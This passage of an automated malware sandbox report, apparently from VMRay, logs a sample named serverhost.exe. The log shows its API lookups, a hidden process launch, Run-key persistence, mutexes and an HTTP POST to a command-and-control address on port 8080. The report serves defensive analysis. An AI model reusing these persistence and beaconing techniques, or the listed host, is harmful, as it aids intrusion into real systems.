gdi32.dll 0x770d0000 0x7711dfff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x77130000 0x77130fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory Readable, Writable True False False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
Host Behavior
File (2)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe os_pid = 0x73c, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Fn
Module (33)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76bd0000 True 1
Fn
Load KERNEL32.dll base_address = 0x76500000 True 2
Fn
Load ADVAPI32.dll base_address = 0x75340000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77060000 True 1
Fn
Load ntdll.dll base_address = 0x76ef0000 True 1
Fn
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe base_address = 0x9e0000 True 1
Fn
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x76c069f2 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x76bddfdc True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x76be0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef4bc True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef4dc True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765533f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x76536ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x7654ca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x76538c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x765abfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7658f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x7654cf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x7654cee8 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7536a4b4 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x7706d250 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x76f37690 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x7653480b True 1
Fn
System (2)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 1
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Mutex (1)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MA991ED3B True 1
Fn
Process #16: serverhost.exe
(Host: 88, Network: 11)
+
Information Value
ID #16
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:00, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:00:25
OS Process Information
+
Information Value
PID 0x73c
Parent PID 0x744 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000ecd9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 780
0x 560
0x 330
0x 338
0x 510
0x 51C
0x 524
0x 50C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
private_0x0000000000040000 0x00040000 0x00040fff Private Memory Readable, Writable True False False
pagefile_0x0000000000050000 0x00050000 0x00056fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000180000 0x00180000 0x0027ffff Private Memory Readable, Writable True False False
locale.nls 0x00280000 0x002e6fff Memory Mapped File Readable False False False
pagefile_0x00000000002f0000 0x002f0000 0x003b7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x003d0000 0x003d0fff Memory Mapped File Readable False False False
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable True False False
private_0x00000000003d0000 0x003d0000 0x003d0fff Private Memory Readable, Writable True False False
pagefile_0x00000000003e0000 0x003e0000 0x003e1fff Pagefile Backed Memory Readable True False False
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory Readable, Writable True False False
pagefile_0x0000000000400000 0x00400000 0x00400fff Pagefile Backed Memory Readable True False False
cversions.1.db 0x00410000 0x00413fff Memory Mapped File Readable True False False
private_0x0000000000410000 0x00410000 0x00418fff Private Memory Readable, Writable True False False
private_0x0000000000410000 0x00410000 0x0041cfff Private Memory Readable, Writable, Executable True False False
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000440000 0x00440000 0x00540fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000550000 0x00550000 0x00942fff Pagefile Backed Memory Readable True False False
rpcss.dll 0x00950000 0x009abfff Memory Mapped File Readable False False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x00950000 0x0096cfff Memory Mapped File Readable True False False
private_0x0000000000970000 0x00970000 0x00993fff Private Memory Readable, Writable True False False
private_0x0000000000970000 0x00970000 0x00981fff Private Memory Readable, Writable True False False
private_0x0000000000990000 0x00990000 0x009a1fff Private Memory Readable, Writable True False False
private_0x00000000009a0000 0x009a0000 0x009c3fff Private Memory Readable, Writable True False False
private_0x00000000009b0000 0x009b0000 0x009c1fff Private Memory Readable, Writable True False False
private_0x00000000009d0000 0x009d0000 0x009d8fff Private Memory Readable, Writable True False False
private_0x00000000009d0000 0x009d0000 0x009dcfff Private Memory Readable, Writable True False False
serverhost.exe 0x009e0000 0x009fafff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000a00000 0x00a00000 0x015fffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01600000 0x018cefff Memory Mapped File Readable False False False
pagefile_0x00000000018d0000 0x018d0000 0x019aefff Pagefile Backed Memory Readable True False False
private_0x00000000019b0000 0x019b0000 0x01aaffff Private Memory Readable, Writable True False False
private_0x0000000001ab0000 0x01ab0000 0x01b9ffff Private Memory Readable, Writable True False False
private_0x0000000001ab0000 0x01ab0000 0x01af7fff Private Memory Readable, Writable True False False
private_0x0000000001b00000 0x01b00000 0x01b47fff Private Memory Readable, Writable True False False
private_0x0000000001b50000 0x01b50000 0x01b5ffff Private Memory Readable, Writable True False False
pagefile_0x0000000001b50000 0x01b50000 0x01b53fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001b50000 0x01b50000 0x01b51fff Pagefile Backed Memory Readable True False False
private_0x0000000001b60000 0x01b60000 0x01b9ffff Private Memory Readable, Writable True False False
private_0x0000000001ba0000 0x01ba0000 0x01c9ffff Private Memory Readable, Writable True False False
serverhost.exe 0x01ca0000 0x01cb6fff Memory Mapped File Readable True False False
rsaenh.dll 0x01ca0000 0x01cdbfff Memory Mapped File Readable False False False
rsaenh.dll 0x01ca0000 0x01cdbfff Memory Mapped File Readable False False False
pagefile_0x0000000001ca0000 0x01ca0000 0x01ca3fff Pagefile Backed Memory Readable, Writable True False False
index.dat 0x01ca0000 0x01caffff Memory Mapped File Readable, Writable True False False
index.dat 0x01cb0000 0x01cb7fff Memory Mapped File Readable, Writable True False False
index.dat 0x01cc0000 0x01ccffff Memory Mapped File Readable, Writable True False False
private_0x0000000001cd0000 0x01cd0000 0x01cd0fff Private Memory Readable, Writable True False False
pagefile_0x0000000001cd0000 0x01cd0000 0x01cd0fff Pagefile Backed Memory Readable True False False
private_0x0000000001ce0000 0x01ce0000 0x01ceffff Private Memory Readable, Writable True False False
private_0x0000000001d40000 0x01d40000 0x01e3ffff Private Memory Readable, Writable True False False
private_0x0000000001e40000 0x01e40000 0x01f3ffff Private Memory Readable, Writable True False False
private_0x0000000001f40000 0x01f40000 0x01fcffff Private Memory Readable, Writable True False False
private_0x0000000001fd0000 0x01fd0000 0x0205ffff Private Memory Readable, Writable True False False
private_0x0000000002060000 0x02060000 0x0215ffff Private Memory Readable, Writable True False False
private_0x0000000002160000 0x02160000 0x021effff Private Memory Readable, Writable True False False
private_0x00000000021f0000 0x021f0000 0x022effff Private Memory Readable, Writable True False False
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory Readable, Writable True False False
private_0x0000000002420000 0x02420000 0x0261ffff Private Memory Readable, Writable True False False
private_0x00000000025c0000 0x025c0000 0x026bffff Private Memory Readable, Writable True False False
imageres.dll 0x6bc60000 0x6cfb5fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x6bd90000 0x6d0e5fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x6cfc0000 0x6e315fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x6d0f0000 0x6e445fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x6e320000 0x6e371fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x6f6f0000 0x6f6f5fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x711a0000 0x711ebfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x71b80000 0x71c03fff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x71c90000 0x71ca4fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x71ce0000 0x71ce7fff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x71cf0000 0x71d01fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x71d10000 0x71d1ffff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x72570000 0x72575fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x73240000 0x73277fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x73350000 0x73356fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x73360000 0x7337bfff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x73480000 0x7348ffff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x73790000 0x737b0fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x737c0000 0x737ccfff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x73a20000 0x73a2cfff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x73a40000 0x73b3afff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x73ea0000 0x73edffff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x73ee0000 0x73fd4fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x74020000 0x741bdfff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x74620000 0x74624fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x746f0000 0x74706fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x748b0000 0x748eafff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74990000 0x749d3fff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x74ac0000 0x74ac5fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74ad0000 0x74b0bfff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74b10000 0x74b25fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74f70000 0x74f8afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74f90000 0x74f9bfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x75040000 0x7504afff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750b0000 0x750bbfff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x75150000 0x75161fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x751a0000 0x751e9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x751f0000 0x7530cfff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x75310000 0x75336fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x75340000 0x753dffff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x753e0000 0x7546efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x754a0000 0x754e4fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x754f0000 0x75590fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x755a0000 0x75694fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x756a0000 0x7573cfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75740000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76390000 0x7645bfff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x76460000 0x76494fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76500000 0x765d3fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x765e0000 0x767dafff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x767e0000 0x767fefff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x76800000 0x7695bfff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x76960000 0x76962fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x76970000 0x769f2fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76a80000 0x76bb5fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76bc0000 0x76bc9fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76bd0000 0x76c98fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x76ca0000 0x76e3cfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76e40000 0x76eebfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x76ef0000 0x7702bfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x77030000 0x77048fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x77060000 0x770b6fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x770c0000 0x770c5fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x770d0000 0x7711dfff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x77130000 0x77130fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory Readable, Writable True False False
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory Readable, Writable True False False
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory Readable, Writable True False False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True False False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True False False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
Host Behavior
File (4)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe type = size True 1
Fn
Registry (2)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ True 1
Fn
Module (45)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76bd0000 True 1
Fn
Load KERNEL32.dll base_address = 0x76500000 True 2
Fn
Load ADVAPI32.dll base_address = 0x75340000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77060000 True 1
Fn
Load ntdll.dll base_address = 0x76ef0000 True 1
Fn
Load advapi32.dll base_address = 0x75340000 True 1
Fn
Load ole32.dll base_address = 0x76800000 True 1
Fn
Load shell32.dll base_address = 0x75740000 True 1
Fn
Load crypt32.dll base_address = 0x751f0000 True 1
Fn
Load urlmon.dll base_address = 0x76a80000 True 1
Fn
Load userenv.dll base_address = 0x746f0000 True 1
Fn
Load wininet.dll base_address = 0x755a0000 True 1
Fn
Load wtsapi32.dll base_address = 0x73a20000 True 1
Fn
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe base_address = 0x9e0000 True 1
Fn
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 3
Fn
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x76c069f2 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x76bddfdc True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x76be0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x16f31c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x16f33c True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x16f41c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765533f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x76536ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x7654ca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x76538c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x765abfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7658f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x7654cf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x7654cee8 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7536a4b4 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x7706d250 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x76f37690 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x7653480b True 1
Fn
Create Mapping C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
+
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (29)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 2
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Get Time type = Ticks, time = 22011 True 1
Fn
Get Time type = Ticks, time = 23025 True 1
Fn
Get Time type = Ticks, time = 24024 True 1
Fn
Get Time type = Ticks, time = 25022 True 1
Fn
Get Time type = Ticks, time = 26020 True 1
Fn
Get Time type = Ticks, time = 27081 True 2
Fn
Get Time type = Ticks, time = 28017 True 1
Fn
Get Time type = Ticks, time = 29016 True 1
Fn
Get Time type = Ticks, time = 30014 True 1
Fn
Get Time type = Ticks, time = 31012 True 1
Fn
Get Time type = Ticks, time = 32027 True 1
Fn
Get Time type = Ticks, time = 33025 True 1
Fn
Get Time type = Ticks, time = 34023 True 1
Fn
Get Time type = Ticks, time = 35022 True 1
Fn
Get Time type = Ticks, time = 36020 True 1
Fn
Get Time type = Ticks, time = 37019 True 1
Fn
Get Time type = Ticks, time = 38017 True 1
Fn
Get Time type = Ticks, time = 39031 True 1
Fn
Get Time type = Ticks, time = 40014 True 1
Fn
Get Time type = Ticks, time = 41012 True 1
Fn
Get Time type = Ticks, time = 42026 True 1
Fn
Get Time type = Ticks, time = 43025 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Get Info type = Operating System False 1
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (4)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MA991ED3B True 1
Fn
Create mutex_name = Global\I78B95E2E True 1
Fn
Create mutex_name = Global\M78B95E2E True 1
Fn
Release mutex_name = Global\I78B95E2E True 1
Fn
Network Behavior
HTTP Sessions (1)
+
Information Value
Total Data Sent 0.32 KB (330 bytes)
Total Data Received 0.15 KB (156 bytes)
Contacted Host Count 1
Contacted Hosts 167.114.121.80
HTTP Session #1
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Server Name 167.114.121.80
Server Port 8080
Username 0
Password 0
Data Sent 0.32 KB (330 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 True 1
Fn
Open HTTP Request http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = 0 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session True 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image